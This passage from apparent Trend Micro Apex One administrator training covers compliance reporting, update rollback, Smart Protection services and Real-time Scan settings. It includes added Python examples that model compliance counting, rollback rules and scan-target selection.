Agents managed by the Apex One Server. Security Compliance generates the report on demand or
according to a schedule. In the Web Management console, click Assessment > Security Compliance >
Manual Report or Schedule Report.

Services
Security Compliance checks whether the following Security Agent services are functional:
• Antivirus
• Anti-spyware
• Firewall
• Web Reputation
• Behavior Monitoring/Device Control (also referred to as Trend Micro Unauthorized Change
Prevention Service)
• Data Protection
• Suspicious Connection

A non-compliant Agent is counted at least twice in the Compliance Report:
• In the Endpoints with Non-compliant Services category
• In the category for which the Security Agent is non-compliant. For example, if the Security
Agent’s Antivirus service is not functional, the Agent is counted in the Antivirus category. If
more than one service is not functional, the Agent is counted in each category for which it is
non-compliant.


Restart non-functional services from the Web Management console or from the Security Agent. If
the services are functional after the restart, the Agent will no longer appear as non-compliant during
the next assessment.

Components
Security Compliance determines component version inconsistencies between the Apex One server
and Security Agents. Inconsistencies typically occur when Agents cannot connect to the Server to
update components. If the Agent obtains updates from another source (such as the Trend Micro
ActiveUpdate server), it is possible for the Agent component version to be newer than the version on
the server.

A non-compliant Agent is counted at least twice in the Compliance Report:
• In the Endpoints with Inconsistent Component Versions category
• In the category for which the Agent is non-compliant. For example, if the Agent Smart Scan
Agent Pattern version is not consistent with the version on the Server, the Agent is counted
in the Smart Scan Agent Pattern category. If more than one component version is
inconsistent, the Agent is counted in each category for which it is non-compliant.


To resolve component version inconsistencies, update outdated components on the Agents or
server.

Scan Compliance
Security Compliance checks if Scan Now or Scheduled Scans are run regularly and if these scans are
completed within a reasonable amount of time. Security Compliance can only report the Scheduled
Scan status if Scheduled Scan is enabled on Agents.

Security Compliance uses the following scan compliance criteria:


• No Scan Now or Scheduled Scan performed for the last (x) days: The Security Agent is non-
compliant if it did not run Scan Now or Scheduled Scan within the specified number of days.
• Scan Now or Scheduled Scan exceeded (x) hours: The Security Agent is non-compliant if the
last Scan Now or Scheduled Scan lasted more than the specified number of hours.

A non-compliant Agent is counted at least twice in the Compliance Report:
• In the Endpoints with Outdated Scanning category
• In the category for which the Agent is non-compliant. For example, if the last Scheduled
Scan lasted more than the specified number of hours, the Agent is counted in the Scan Now
or Scheduled Scan exceeded <x> hours category. If the Agent satisfies more than one scan
compliance criteria, it is counted in each category for which it is non-compliant.


Run Scan Now or Scheduled Scan on Agents that have not performed scan tasks or were unable to
complete scanning.

Settings
Security Compliance determines whether Agents and their parent domains in the Agent tree have
the same settings. The settings may not be consistent if you move any Agents to another domain
that is applying a different set of settings, or if any Agent user with certain privileges manually
configured settings on the Security Agent console.

A non-compliant Agent is counted at least twice in the Compliance Report:
• In the Endpoints with Inconsistent Configuration Settings category
• In the category for which the Agent is non-compliant. For example, if the scan method
settings in the Agent and its parent domain are not consistent, the Agent is counted in the
Scan Method category. If more than one set of settings is inconsistent, the Agent is counted
in each category for which it is non-compliant.


To resolve the setting inconsistencies, apply domain settings to the Agent.
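The counting rule repeated for all four compliance areas (services, components, scanning and settings) is easy to get wrong when reading a report, so here it is worked through in code. This is an added example, not Trend Micro code; the Agent fleet, component versions, setting values and the thresholds of 7 days and 4 hours are constructed.

```python
"""Security Compliance counting for the four areas of the Compliance Report.

Added example, not Trend Micro code. It applies the rule stated for each
area: a non-compliant Agent is counted once in the area's "Endpoints with ..."
category and once more in every sub-category it fails, so it always appears
at least twice. The Agents, server versions and domain settings are constructed.
"""
from collections import Counter
from dataclasses import dataclass

SERVICES = ["Antivirus", "Anti-spyware", "Firewall", "Web Reputation",
            "Behavior Monitoring/Device Control", "Data Protection",
            "Suspicious Connection"]


@dataclass
class Agent:
    name: str
    services: dict          # service -> False if not functional (missing = functional)
    components: dict        # component -> version on the Agent
    settings: dict          # setting -> value on the Agent
    days_since_scan: int    # days since the last Scan Now / Scheduled Scan
    last_scan_hours: float  # duration of that scan


def count_area(agents, umbrella, failures_of):
    """Counter for one area: +1 under `umbrella` and +1 per failed sub-category."""
    counts = Counter()
    for agent in agents:
        failed = failures_of(agent)
        if failed:
            counts[umbrella] += 1
            for category in failed:
                counts[category] += 1
    return counts


def compliance_report(agents, server_components, domain_settings,
                      max_days=7, max_hours=4):
    def bad_services(a):
        return [s for s in SERVICES if not a.services.get(s, True)]

    def bad_components(a):
        # Any version difference is an inconsistency, including an Agent that
        # is newer than the Server because it updated from another source.
        return [c for c, v in server_components.items()
                if a.components.get(c) != v]

    def bad_scans(a):
        failed = []
        if a.days_since_scan > max_days:
            failed.append("No Scan Now or Scheduled Scan performed for the last "
                          f"{max_days} days")
        if a.last_scan_hours > max_hours:
            failed.append(f"Scan Now or Scheduled Scan exceeded {max_hours} hours")
        return failed

    def bad_settings(a):
        # Settings are compared with the Agent's parent domain in the Agent tree.
        return [k for k, v in domain_settings.items() if a.settings.get(k) != v]

    return {
        "services": count_area(agents, "Endpoints with Non-compliant Services",
                               bad_services),
        "components": count_area(agents,
                                 "Endpoints with Inconsistent Component Versions",
                                 bad_components),
        "scans": count_area(agents, "Endpoints with Outdated Scanning", bad_scans),
        "settings": count_area(agents,
                               "Endpoints with Inconsistent Configuration Settings",
                               bad_settings),
    }


# Constructed sample fleet. Version strings and setting values are made up.
SERVER_COMPONENTS = {"Smart Scan Agent Pattern": "15.123.00",
                     "Virus Scan Engine": "12.000.1004"}
DOMAIN_SETTINGS = {"Scan Method": "Smart Scan", "Real-time Scan": "Enabled"}
SAMPLE_AGENTS = [
    Agent("WS01", {}, dict(SERVER_COMPONENTS), dict(DOMAIN_SETTINGS), 1, 0.5),
    # Two services down and a pattern newer than the Server's
    Agent("WS02", {"Antivirus": False, "Firewall": False},
          {**SERVER_COMPONENTS, "Smart Scan Agent Pattern": "15.125.00"},
          dict(DOMAIN_SETTINGS), 2, 1.0),
    # No recent scan, last scan too long, and a scan method changed locally
    Agent("WS03", {}, dict(SERVER_COMPONENTS),
          {**DOMAIN_SETTINGS, "Scan Method": "Conventional Scan"}, 10, 6.0),
]


def sample_report():
    return compliance_report(SAMPLE_AGENTS, SERVER_COMPONENTS, DOMAIN_SETTINGS)


if __name__ == "__main__":
    for area, counts in sample_report().items():
        print(area, dict(counts))
```

WS02 shows up three times in the services area (once under Endpoints with Non-compliant Services, once each under Antivirus and Firewall), which is the "counted at least twice" behaviour the text describes.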

Update Summary
A summary report of updated online and offline Agents can be displayed. Click Updates > Update
Summary.


Rollback
Rolling back updates refers to restoring previous versions of updated or replaced components in an
on-premise installation of Apex One. The ActiveUpdate module performs the rollback procedure
when:
• The update/patch application process cannot be completed because of an error. For
example, there was a problem extracting a compressed update.
• The administrator issues a rollback command from the Web Management console. This
means the update process itself was successfully completed, but the administrator wanted
to use previous components for some reason.

Note: Agents that are updated through Update Agents cannot be rolled back using the Web
Management console. The administrator must manually roll them back.

Rolling Back Patterns

When Agents receive a pattern rollback notification from the Server, they check the version of
the pattern file on the Server. If the version on the Server is older than that on the Agent, a
Force Update will be triggered and the Agents will roll back to the pattern file on the Server.

Note: Only full virus patterns can be rolled back from the Web Management console. Non-virus related
patterns, and virus-related incremental patterns, are not covered by rollback functionality at this
time.


The Apex One Server retains the last five virus patterns, which can all be used for rolling back.
The Agent, on the other hand, only retains two older patterns.

Rolling Back Engines

When the scan engine files on the Server are updated, the following folder is created to store the
last versions of the scan engine:

…\PCCSRV\Download\Rollback

Records about the last scan engine versions are also stored in the rollback section of the
ofcscan.ini, for example:

[INI_ROLLBACK_SECTION]

RollBack_Previous_NT_Engine=6.810.1005

Note: Only the VSAPI scan engine can be rolled back from the Web Management console.

Both the Server and Agent retain the previous version of the scan engine for rollback purposes.
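The rollback rules above (the Server keeps the last five virus patterns, the Agent force-updates only when the Server's pattern is older than its own, and the previous engine version lives in the [INI_ROLLBACK_SECTION] of ofcscan.ini) are modelled in this added example. It is not Trend Micro code; the pattern version history is constructed, and only the engine version 6.810.1005 is taken from the text.

```python
"""Rollback rules for Apex One virus patterns and the scan engine.

Added example, not Trend Micro code. Pattern versions below are constructed;
the engine version is the one quoted in the text.
"""
import configparser

SERVER_RETAINED_PATTERNS = 5   # the Server keeps the last five virus patterns

# Constructed stand-in for the rollback section of ofcscan.ini.
OFCSCAN_INI = """
[INI_ROLLBACK_SECTION]
RollBack_Previous_NT_Engine=6.810.1005
"""


def parse_version(version):
    """'6.810.1005' -> (6, 810, 1005); tuples compare numerically, strings would not."""
    return tuple(int(part) for part in version.strip().split("."))


def previous_engine_version(ini_text=OFCSCAN_INI):
    """Read the engine version recorded for rollback from ofcscan.ini text."""
    cfg = configparser.ConfigParser()
    cfg.read_string(ini_text)
    return cfg.get("INI_ROLLBACK_SECTION", "RollBack_Previous_NT_Engine")


def retained_patterns(pattern_history):
    """`pattern_history` lists the pattern versions the Server has used, oldest
    first; only the last five are kept and therefore available for rollback."""
    return pattern_history[-SERVER_RETAINED_PATTERNS:]


def server_roll_back(pattern_history, target):
    """Console-issued rollback: returns the version the Server now serves, or
    raises if the requested version is no longer retained."""
    if target not in retained_patterns(pattern_history):
        raise ValueError(f"{target} is not among the retained patterns")
    return target


def agent_on_rollback_notification(agent_version, server_version):
    """Agent side: on a rollback notification the Agent checks the Server's
    pattern version. Returns ('force_update', version) when the Server holds
    an older pattern than the Agent, otherwise ('no_change', version)."""
    if parse_version(server_version) < parse_version(agent_version):
        return ("force_update", server_version)
    return ("no_change", agent_version)


if __name__ == "__main__":
    history = ["15.100.00", "15.101.00", "15.102.00",
               "15.103.00", "15.104.00", "15.105.00"]
    served = server_roll_back(history, "15.103.00")
    print("server now serves", served)
    print("agent on 15.105.00 ->", agent_on_rollback_notification("15.105.00", served))
    print("previous engine:", previous_engine_version())
```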

Server Tuner Tool

The Server Tuner Tool (SvrTune.exe) can be used to adjust the performance of Apex One updates. The
tool can be located in the following folder:
...\PCCSRV\Admin\Utility\SvrTune


Download Settings
When the number of Security Agents (including Update Agents) requesting updates from the Apex
One Server exceeds the Server's available resources, the Server moves the Agent update request
into a queue and processes the requests when resources become available. After the Agent
successfully updates components from the Apex One Server, it notifies the Server that the update is
complete. Set the maximum number of minutes the Apex One Server waits to receive an update
notification from the Agent. Also set the maximum number of times the server tries to notify the
Agent to perform an update and to apply new configuration settings. The Server keeps trying only if
it does not receive Agent notification.
• Timeout for client: specifies how long the Apex One Server will wait for the Agent to
acknowledge the update as successful
• Timeout for Update Agent: specifies how long the Apex One Server will wait for the Update
Agent to acknowledge the update as successful
• Retry count: specifies how many times the Server will attempt to update an Agent
• Retry interval: specifies how long the Apex One Server will wait before checking the update
queue

Network Traffic Settings


The Network Traffic section defines the hours of the day that constitute the normal, off-peak, and
peak hours in your network. The Maximum Client Connections setting specifies the number of Agents
that the Server will notify about the updates at one time. There are two types of Agents:
• Apex One and other update source: Apex One Server or other update source (including
ActiveUpdate Server, and internal update web pages)
• Update Agent

Note: After the Server notifies the Agents that updates are available, the Agents will attempt to update
from their designated update sources. The number of Agents in the network and the network
resources will determine the best timeout value for the setting.

Default Settings
The Apex One Server waits up to 30 minutes for each notified Agent in a group to complete the
update sequence. If an Agent cannot finish the update within the 30-minute time frame, the Apex
One Server will notify the next Agent in the queue. By default, an Agent attempts to download
updates from the Server up to five times at 15-minute intervals.


Recommended Configurations for Improved Performance


In large networks, small maximum connection settings, shorter timeouts, and fewer retries may
update the Agents more quickly.

Under Network Traffic, specify the number of Agents the Server will notify at a time about the
updates. Since the Update Agents receive their updates before the Agents are notified, you need to
set the Timeout for Update Agent setting with sufficient time. The default setting of 10 minutes may
require an increase if the network is very large.

Update Utilities
Apex One includes utilities that can be used to schedule updates.

Domains Schedule Update Tool


This tool allows an organization to configure a schedule based on Agent Tree Domains. All Agents
belonging to the domain will apply the schedule. The dsu_convert.exe tool can be found in the
following folder:
...\PCCSRV\Admin\Utility\DomainScheduledUpdate

Scheduled Update Configuration Tool


This tool (SUCTool.exe) is used to enable and configure scheduled updates on an Update Agent
that was installed using Agent Packager. This tool is not available if the Update Agent was installed
using other installation methods.


Lesson 7: Trend Micro Smart Protection

Lesson Objectives:

After completing this lesson, participants will be able to:


• Define the Smart Protection Services used by Apex One
• Configure Smart Protection Sources

Smart Protection includes services that provide anti-malware signatures, web reputation credibility
scores, vulnerability patterns, in-the-cloud threat databases and more. Smart Protection Services used
by Apex One include:
• File Reputation Services
• Web Reputation Services
• Predictive Machine Learning Services
• Census Service
• Certified Safe Software Service
• Smart Feedback

File Reputation Services


File Reputation Services check the reputation of each file against an extensive in-the-cloud database.
Since the malware information is stored in the cloud, it is available instantly to all users. The cloud-
Agent architecture eliminates the burden of pattern deployment while significantly reducing the
overall Agent footprint.

Security Agents must be in Smart Scan mode to use File Reputation Services.

Web Reputation Services


With one of the largest domain-reputation databases in the world, Trend Micro Web reputation
technology tracks the credibility of Web domains by assigning a reputation score based on factors
such as a Website's age, historical location changes and indications of suspicious activities
discovered through malware behavior analysis. Web reputation then continues to scan sites and
block users from accessing infected ones. Web reputation features help ensure that the pages that
users access are safe and free from Web threats, such as malware, spyware, and phishing scams that
are designed to trick users into providing personal information. To increase accuracy and reduce
false positives, Trend Micro Web reputation technology assigns reputation scores to specific pages
or links within sites instead of classifying or blocking entire sites, since often, only portions of
legitimate sites are hacked and reputations can change dynamically over time.

Predictive Machine Learning Services


Apex One provides enhanced malware protection for unknown threats and zero-day attacks through
Predictive Machine Learning. Trend Micro Predictive Machine Learning uses advanced machine
learning technology to correlate threat information and perform in-depth file analysis to detect
emerging security risks through digital DNA fingerprinting, API mapping, and other file features.

Predictive Machine Learning is effective in protecting against security breaches that result from
targeted attacks using techniques such as phishing and spear phishing. In these cases, malware that
is designed specifically to target your environment can bypass traditional malware scanning
techniques.

During real-time scans, when Apex One detects an unknown or low-prevalence file, Apex One scans
the file using the Advanced Threat Scan Engine (ATSE) to extract file features. It then sends the
report to the Predictive Machine Learning engine which is hosted on the Trend Micro Smart
Protection Network. Through the use of malware modeling, Predictive Machine Learning compares
the sample to the malware model, assigns a probability score, and determines the probable malware
type that the file contains. If the file is identified as a threat, Apex One quarantines the file to
prevent the threat from continuing to spread across your network.

Census Service
This service provides information about the prevalence of detected files. Prevalence is a statistical
concept referring to the number of times a file was detected by Trend Micro sensors at a given time.
If a file has not triggered any detections, the file becomes suspicious as over 80% of all malware is
only seen once.

Census covers over 300 million distinct executable files. File prevalence and maturity is important
because polymorphism is the primary weapon of malware. An unknown binary can mean a possible
targeted attack.

Certified Safe Software Service


The Certified Safe Software Service provides a comprehensive list of applications considered to be
safe by Trend Micro. The list includes most popular operating system files and binaries as well as
applications for desktops, servers, and mobile devices. Trend Micro periodically provides updates to
the list.

Certified Safe Software Service queries Trend Micro datacenters to check submitted sample files
and objects against these databases. White listing known good files is used to:
• Reduce false positives
• Save computing time and resources
• Provide a mechanism for locking down systems from any undesired infiltration

Sources for the Certified Safe Software Service include:


• Internal sources, such as the File Reputation Service, Tech Support, All Trend Release Builds,
etc.
• Partnerships with other tech companies, including Adobe, Apple, Google, Mozilla, Cisco,
Acer, VMWare, Yahoo!, Citrix, Intel, Intuit, Bigfish Games, Electronics Arts, etc.

• Targeted, pro-active sourcing including software download sources, such as Cnet
download.com, Majorgeeks, Softpedia, Sourceforge, crawlers, etc.
• Subscriptions, including National Software Reference Library, MSDN, and some regional
magazines (especially from Europe) that include DVDs/applications
• Local sourcing teams for P regional file collection
• GRID (Good Reputation Index Database), the world’s largest goodware catalog with over 700
million unique files and 130+ Grid Partners
• Customer Submission, for example, through Customer Support

Smart Feedback
Trend Micro Smart Feedback provides continuous communication between Trend Micro products
and its 24/7 threat research centers and technologies. Each new threat identified through every
single customer's routine reputation check automatically updates all Trend Micro threat databases,
blocking any subsequent customer encounters of a given threat.

By continuously processing the threat intelligence gathered through its extensive global network of
customers and partners, Trend Micro delivers automatic, real-time protection against the latest
threats and provides better together security, much like an automated neighborhood watch that
involves the community in the protection of others. Because the gathered threat information is
based on the reputation of the communication source, not on the content of the specific
communication, the privacy of a customer's personal or business information is always protected.

Samples of information sent to Trend Micro through Smart Feedback include:


• File checksums
• Websites accessed
• File information, including sizes and paths
• Names of executable files

You can terminate your participation in the program at any time from the Web Management console.
You do not need to participate in Smart Feedback to protect your endpoints. Your participation is
optional and you may opt out at any time. Trend Micro recommends that you participate in Smart
Feedback to help provide better overall protection for all Trend Micro customers.

Service URLs
The URLs used by the Security Agent to communicate with these services include:
• Predictive Machine Learning: osce140-en-f.trx.trendmicro.com or
osce140-en-b.trx.trendmicro.com
• ActiveUpdate: osce14-p.activeupdate.trendmicro.com/activeupdate
• Census: osce14-en-census.trendmicro.com
• Certified Safe Software Service: osce14-en.gfrbridge.trendmicro.com
• Web Reputation: osce14-0-en.url.trendmicro.com
• Smart Scan: osce14.icrc.trendmicro.com/tmcss
• Smart Feedback: osce140-en.fbs25.trendmicro.com

Smart Protection Sources


The Smart Protection source can be either:
• Trend Micro Smart Protection Network
• Smart Protection Server

Trend Micro Smart Protection Network


The Trend Micro Smart Protection Network is a cloud-client content security infrastructure designed
to protect customers from security risks and Web threats. It powers both on-premise and Trend
Micro hosted solutions to protect users whether they are on the network, at home, or on the go.
Protection is automatically updated and strengthened as more products, services and users access
the network, creating a real-time neighborhood watch protection service for its users.

Smart Protection Server


Smart Protection Servers are for users who have access to their local corporate network. Local
servers localize Smart Protection Services, including File Reputation and Web Reputation, to the
corporate network to optimize efficiency. There are two types of Smart Protection Servers:
• Integrated Smart Protection Server
• Standalone Smart Protection Server

Integrated Smart Protection Server

The Integrated Smart Protection Server is installed on the Apex One Server. It can be installed
during Apex One Server installation or at a later point by using the Integrated Smart Protection
Server Installation Tool located in:
...\PCCSRV\Admin\Utility\ISPSInstaller\

This server is only recommended for networks with 1,000 Agents or less, and for test
deployments.

The Integrated Smart Protection Server can be enabled through the Apex One Web Management
console.

Enabling or disabling the services related to Smart Protection Server changes the corresponding
parameter in the Ofcserver.ini file. The Apex One Master Service is directly responsible for
starting and stopping the Integrated Smart Protection Server service (iCRCService.exe) in
response to Web Management console commands.

Standalone Smart Protection Server

The Standalone Smart Protection Server is recommended in the following situations:


• Larger networks of 1000 Agents or more
• Performance issues on Apex One server or not enough resources to contain an
integrated SPS
• Remote office VPN with low bandwidth communication with the Apex One server
• For Load Balancing and High Availability

This server is available as a VMware image that runs CentOS and is compatible with the following
virtual servers:
• VMware ESXi Server 6.5, 6.0 Update 2 and 5.5 Update 3b
• Microsoft Windows Server 2008 R2 with Hyper-V
• Microsoft Windows Server 2012 with Hyper-V
• Microsoft Windows Server 2012 R2 with Hyper-V
• Microsoft Windows Server 2016 with Hyper-V
• Citrix XenServer 7.2, 7.1, 6.5

The following table defines and highlights the differences between the Smart Protection
Network and Local Smart Protection Servers:

Availability
    Smart Protection Network: External Agents, that is, Agents that don't meet the location
    criteria specified on the Apex One Web Management console
    Local Smart Protection Servers: Internal Agents, that is, Agents that meet the location
    criteria specified on the Apex One Web Management console

Purpose
    Smart Protection Network: A globally scaled Internet-based infrastructure that provides
    Smart Protection Services to Agents that do not have immediate access to their corporate
    network
    Local Smart Protection Servers: A local Smart Protection Service for the corporate network,
    used to optimize efficiency

Connection Protocol
    Smart Protection Network: HTTPS
    Local Smart Protection Servers: File Reputation: HTTP, HTTPS; Web Reputation: HTTP only

Administration
    Smart Protection Network: Trend Micro
    Local Smart Protection Servers: Apex One Server administrator

Pattern Update Source
    Smart Protection Network: Trend Micro ActiveUpdate
    Local Smart Protection Servers: Trend Micro ActiveUpdate

Types
    Smart Protection Network: n/a
    Local Smart Protection Servers: Integrated (installed on the same computer where the Apex
    One Server is deployed) or Standalone (installed on a VMware or Hyper-V server or Citrix
    XenServer)

Configuring the Agent Smart Protection Source


Agents send queries to Smart Protection sources (the Trend Micro Smart Protection Network, or a local
Smart Protection Server) when scanning for security risks and determining a Website’s reputation.

[Figure: a Security Agent switching between the Trend Micro Smart Protection Network and a
Smart Protection Server (integrated or standalone)]

Security Agents can switch between these Smart Protection sources based on their location relative to
the corporate network. When the Agent detects that it is outside the corporate network, it will look for
the Trend Micro Smart Protection Network, and when it is inside the network, it will look for pre-
designated Smart Protection Servers.

To reduce the possibility of going off-line, Security Agents can be assigned multiple Smart Protection
Servers. If the Agent is unable to query one Smart Protection Server, it can switch to an alternative
Smart Protection Server if another is available, thereby avoiding a single-point-of-failure for cloud
scanning functionality.

Note: If an Agent is internal and cannot connect to an internal Smart Protection Server, it will not
automatically connect to the Global Smart Protection Server unless the URL of that server
appears in the list.



Lesson 8: Protecting Endpoint Computers From Malware

Lesson Objectives:

After completing this lesson, participants will be able to:


• Configure malware and grayware scanning
• Quarantine malware
• Describe SmartScan
• Configure and enable Outbreak Prevention

Apex One protects endpoint computers against malicious software, such as viruses, spyware,
ransomware, Trojans and other malware. Different scanning techniques protect against known and
unknown malware.

Scanning for Malware


Security Agents scan endpoint computers for malware through one of the following methods:
• Real-time Scan: This method scans files, folders and URLs as soon as they are accessed,
triggered by I/O event hooking.
• Manual Scan: This method scans files and folders on demand, when initiated by the end user.
• Scheduled Scan: This method uses the same scanning methods and has the same detection
capabilities as used for on-demand scanning. Scheduled scans are, however, triggered
automatically based on a selected frequency (daily, weekly or monthly) and a specified time.
• Scan Now: This method scans files and folders on demand on one or more target computers
when initiated by the Administrator.

NT Real-time Scan Service


The NT Real-time Scan Service performs on-demand (Manual, Scheduled, Scan Now), and Real-time
scanning functionality. This service (NTRtScan.exe) uses the following scan engines:
• Virus Scanning API (VSAPI)
• Spyware Scanning API (SSAPI)
• Damage Cleanup Engine (DCE)
• Advanced Threat Scan Engine (ATSE)

This service also assumes responsibility for starting the Unauthorized Change Prevention Service
(TMBMSRV.exe).

When applications access or create files on the file system, they send information to the Microsoft
I/O Manager. This is true for both legitimate applications and malware. To be able to differentiate
between legitimate and malicious I/O events, and deal with them if they are of the latter variety,
Trend Micro products need a way to monitor these events as they occur, evaluate them, and then
take action when necessary.

Apex One registers with the Microsoft I/O Manager to identify file access and modification events on
the file system. This registration also grants Apex One access to the file when scanning is required.

[Figure: create/write requests and read requests passing through the Microsoft I/O Manager,
with Apex One registered to receive them]

Scan Settings
These settings determine which files on the Security Agent host are scanned in each of the four
scanning types. Scanning is a resource intensive process. Judicious use of scanning coverage options
can strike a balance between security and minimizing the impact of scanning events on the network.

Each of the four scan types may have slightly different configuration options and include setting
collections displayed through the following tabs:
• Scan Target: This tab defines how the Security Agent looks for files to scan.
• Scan Action: This tab defines the action to be taken when malware is detected.
• Scan Exclusion: This tab defines scan exclusions to increase the scanning performance and skip
scanning files causing false alarms. When a particular scan type runs, Apex One checks the scan
exclusion list to determine which files on the endpoint will be excluded from both virus/malware
and spyware/grayware scanning. When you enable scan exclusion, Apex One will not scan a file
under the following conditions:
- The file is found under a specific directory (or any of its sub-directories).
- The file name matches any of the names in the exclusion list.
- The file extension matches any of the extensions in the exclusion list.

Real-Time Scan Settings


These settings are used when Real-time scanning is enabled on Security Agents.

Real-Time Scan Target Tab

User Activity on Files Section


• Scan files being: Files will be scanned when they are created/modified, retrieved or both

Files to Scan Section


• All scannable files: Scans all files
• File types scanned by IntelliScan: IntelliScan is a method of identifying files to scan. For
executable files (for example, .exe), the true file type is determined based on the file
content. For non-executable files (for example, .txt), the true file type is determined based
on the file header. Using IntelliScan provides the following benefits:
- Performance optimization: IntelliScan does not affect applications on the Agent because
it uses minimal system resources.

- Shorter scanning period: Because IntelliScan uses true file type identification, it only
scans files that are vulnerable to infection. The scan time is therefore significantly
shorter than when you scan all files.
• Files with the following extensions: Only scan files whose extensions are included in the file
extension list. Add new extensions or remove any of the existing extensions.
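The Scan Exclusion conditions (directory or sub-directory, file name, extension) and the IntelliScan idea of choosing files by their true type rather than their extension decide together which files Real-time Scan actually looks at. This added example models that decision; it is not Trend Micro code, and the exclusion lists, the magic-byte table and the set of types treated as "vulnerable to infection" are constructed stand-ins.

```python
"""Scan-target selection: the Scan Exclusion list plus IntelliScan-style typing.

Added example, not Trend Micro code. Exclusion lists, the magic-byte table and
VULNERABLE_TYPES are constructed; they stand in for Trend Micro's own lists.
Path matching is case-insensitive, as Windows paths are.
"""
from pathlib import PureWindowsPath

EXCLUDED_DIRS = [r"C:\Apps\Trusted", r"D:\Backups"]
EXCLUDED_FILES = ["pagefile.sys", "hiberfil.sys"]
EXCLUDED_EXTS = [".log", ".tmp"]


def is_excluded(path, dirs=EXCLUDED_DIRS, names=EXCLUDED_FILES, exts=EXCLUDED_EXTS):
    """True if any of the three Scan Exclusion conditions matches."""
    p = PureWindowsPath(path)
    parts = [s.lower() for s in p.parts]
    for d in dirs:
        d_parts = [s.lower() for s in PureWindowsPath(d).parts]
        # Compare whole path components so C:\Apps\TrustedX is not C:\Apps\Trusted
        if parts[:len(d_parts)] == d_parts:      # directory or any sub-directory
            return True
    if p.name.lower() in {n.lower() for n in names}:
        return True
    return p.suffix.lower() in {e.lower() for e in exts}


# Constructed magic-byte table standing in for true file type identification.
MAGIC = [(b"MZ", "executable"), (b"\x7fELF", "executable"),
         (b"PK\x03\x04", "zip-container"), (b"%PDF", "pdf")]
# Types this example treats as "vulnerable to infection" (constructed choice).
VULNERABLE_TYPES = {"executable", "zip-container", "pdf"}


def true_file_type(head):
    """Classify by the leading bytes, ignoring the file's extension entirely."""
    for signature, kind in MAGIC:
        if head.startswith(signature):
            return kind
    return "other"


def should_scan(path, head, mode="intelliscan", ext_list=(".exe", ".dll")):
    """Apply the exclusion list first, then the selected Files-to-Scan mode:
    'all', 'intelliscan' (true file type) or 'extensions' (extension list only)."""
    if is_excluded(path):
        return False
    if mode == "all":
        return True
    if mode == "intelliscan":
        return true_file_type(head) in VULNERABLE_TYPES
    if mode == "extensions":
        return PureWindowsPath(path).suffix.lower() in ext_list
    raise ValueError(f"unknown mode {mode!r}")


if __name__ == "__main__":
    # A renamed executable: extension says text, content says PE executable.
    disguised = (r"C:\Users\bob\invoice.txt", b"MZ\x90\x00\x03\x00\x00\x00")
    print("intelliscan:", should_scan(*disguised, mode="intelliscan"))  # True
    print("extensions: ", should_scan(*disguised, mode="extensions"))   # False
```

The renamed executable in the usage at the bottom is scanned under IntelliScan but skipped by the extension-list mode, which is the difference the text describes between true-type and extension-based selection.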

Scan Settings Section

Scan floppy disk during system shutdown: Real-time Scan scans any floppy disk for boot viruses
before shutting down the endpoint. This prevents any virus/malware from executing when a
user reboots the endpoint from the disk.

Scan network drive: Scans network drives or folders mapped to the Security Agent endpoint
during Manual Scan or Real-time Scan.

Scan the boot sector of the USB storage device after plugging in: Automatically scans only the
boot sector of a USB storage device every time the user plugs it in (Real-time Scan).

Scan all files in removable storage devices after plugging in: Automatically scans all files on a
USB storage device every time the user plugs it in (Real-time Scan).

Quarantine malware variants detected in memory: Behavior Monitoring scans the system
memory for suspicious processes and Real-time Scan maps the process and scans it for malware
threats. If a malware threat exists, Real-Time scan quarantines the process and/or file.

Note: This feature requires that administrators enable the Unauthorized Change Prevention Service
and the Advanced Protection Service.

Scan compressed files: Allows Apex One to scan up to a specified number of compression layers
and skip scanning any excess layers. Apex One also cleans or deletes infected files within
compressed files. For example, if the maximum is two layers and a compressed file to be scanned
has six layers, Apex One scans two layers and skips the remaining four. If a compressed file
contains security threats, Apex One cleans or deletes the file.

Note: Apex One treats Microsoft Office 2007 files in Office Open XML format as compressed files.
Office Open XML, the file format for Office 2007 applications, uses ZIP compression
technologies. If you want files created using these applications to be scanned for viruses/
malware, you need to enable scanning of compressed files.

Scan OLE objects: When a file contains multiple Object Linking and Embedding (OLE) layers,
Apex One scans the specified number of layers and ignores the remaining layers.

Detect exploit code in OLE files: OLE Exploit Detection heuristically identifies malware by
checking Microsoft Office files for exploit code. The specified number of layers is applicable to
both Scan OLE objects and Detect exploit code options.

Enable IntelliTrap: Detects and removes virus/malware on compressed executable files. Virus
writers often attempt to circumvent virus filtering by using real-time compression algorithms.
IntelliTrap helps reduce the risk of such viruses entering the network by blocking real-time
compressed executable files and pairing them with other malware characteristics. Because
IntelliTrap identifies such files as security risks and may incorrectly block safe files, consider
quarantining (not deleting or cleaning) files after enabling IntelliTrap. If users regularly
exchange real-time compressed executable files, disable IntelliTrap. This option is available only
for Real-time Scan.

Enable CVE exploit scanning for files downloaded through web and email channels: Blocks
processes that attempt to exploit known vulnerabilities in commercially available products based
on the Common Vulnerabilities and Exposures (CVE) system. This option is available only for
Real-time Scan.

Real-Time Scan Action Tab

When the Security Agent detects malware, it can take the actions defined on this tab.

Virus/Malware Section

Use ActiveAction: With this option, the administrator relies on Trend Micro action
recommendations that are stored within the VSAPI pattern. Trend Micro Anti-virus engineers
determine these actions based on their analysis of various malware types. Customizing the
action allows the administrator to control the scan action according to the network's specific
needs.

Use the same action for all virus/malware types: Select this option if you want the same action
performed on all types of virus/malware, except probable virus/malware. If you choose Clean as
the first action, select a second action that Apex One performs if cleaning is unsuccessful. If the
first action is not Clean, no second action is configurable. If you choose Clean as the first action,
Apex One performs the second action when it detects probable virus/malware.

Use a Specific Action for Each Virus/Malware Type: Manually select a scan action for each virus/
malware type. For all virus/malware types except probable virus/malware, all scan actions are
available. If you choose Clean as the first action, select a second action that Apex One performs
if cleaning is unsuccessful. If the first action is not Clean, no second action is configurable.
• Pass: The Agent does nothing to the malware.
• Rename: Encrypt and rename the infected file. The Agent uses scan engine functions to
change the file's extension to .VIR (or to .VI0, .VI1 and so on). If a virus is found and the
virus action is Rename, the action performed will be Clean or, if uncleanable, Quarantine.
A compressed file with an infected file inside will be renamed.
• Quarantine: The Security Agent moves malware to a quarantine folder on the Agent, and
then to a quarantine folder on the Apex One Server.
• Clean: Remove the virus code from the file. The Agent can only clean files within ZIP/
LHA files up to one layer of compression.
• Delete: Delete the infected file. The Agent can delete files within ZIP/LHA files up to 6
layers of compression.
• Deny Access: Prevent access to the infected file.

Note: Probable malware refers to suspicious files that have some of the characteristics of viruses/
malware.

Display a Notification Message When Virus/Malware is Detected: When Apex One detects virus/
